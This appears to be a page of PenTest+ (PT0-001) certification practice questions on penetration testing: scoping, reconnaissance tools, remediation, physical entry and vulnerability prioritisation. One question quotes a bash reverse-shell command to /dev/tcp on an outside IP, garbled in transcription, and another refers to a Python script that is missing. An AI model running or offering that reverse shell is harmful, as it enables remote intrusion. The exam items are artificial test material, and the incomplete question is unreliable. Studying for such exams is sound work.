PT0-001 Online Practice Questions and Answers

The following line was found in an exploited machine's history file. An attacker ran the following command:

bash -i >and /dev/tcp/192.168.0.1/80 0> and1

Which of the following describes what the command does?

A. Performs a port scan.

B. Grabs the web server's banner.

C. Redirects a TTY to a remote system.

D. Removes error logs for the supplied IP.

A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester's source IP addresses to the client's IPS whitelist for the duration of the test. Which of the following is the BEST argument as to why the penetration tester's source IP addresses should be whitelisted?

A. Whitelisting prevents a possible inadvertent DoS attack against the IPS and supporting log-monitoring systems.

B. Penetration testing of third-party IPS systems often requires additional documentation and authorizations; potentially delaying the time-sensitive test.

C. IPS whitelisting rules require frequent updates to stay current, constantly developing vulnerabilities and newly discovered weaknesses.

D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.

A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack Which of the following remediation steps should be recommended? (Select THREE)

A. Mandate all employees take security awareness training

B. Implement two-factor authentication for remote access

C. Install an intrusion prevention system

D. Increase password complexity requirements

E. Install a security information event monitoring solution.

F. Prevent members of the IT department from interactively logging in as administrators

G. Upgrade the cipher suite used for the VPN solution

Given the following Python script:

Which of the following is where the output will go?

A. To the screen

B. To a network server

C. To a file

D. To /dev/null

Joe, a penetration tester, is asked to assess a company's physical security by gaining access to its corporate office. Joe ism looking for a method that will enable him to enter the building during business hours or when there are no employee on-site. Which of the following would be MOST effective in accomplishing this?

A. Badge cloning

B. Lock picking

C. Tailgating

D. Piggybacking

Which of the following actions BEST matches a script kiddie's threat actor?

A. Exfiltrate network diagrams to perform lateral movement

B. Steal credit cards from the database and sell them in the deep web

C. Install a rootkit to maintain access to the corporate network

D. Deface the website of a company in search of retribution

When conducting reconnaissance against a target, which of the following should be used to avoid directory communicating with the target?

A. Nmap tool

B. Maltego community edition

C. Nessus vulnerability scanner

D. OpenVAS

E. Melasploit

Defining exactly what is to be tested and the results to be generated from the test will help prevent?

A. testing scope creep

B. scheduling conflicts

C. impact on production

D. disclosure of information.

A penetration tester has performed a vulnerability scan of a specific host that contains a valuable database and has identified the following vulnerabilities:

1.

XSS

2.

HTTP DELETE method allowed

3.

SQL injection

4.

Vulnerable to CSRF

To which of the following should the tester give the HIGHEST priority?

A. SQL injection

B. HTTP DELETE method allowed

C. Vulnerable to CSRF

D. XSS

Which of the following tools can be used to perform a basic remote vulnerability scan of a website's configuration?

A. Mimikatz

B. BeEF

C. Nikto

D. Patator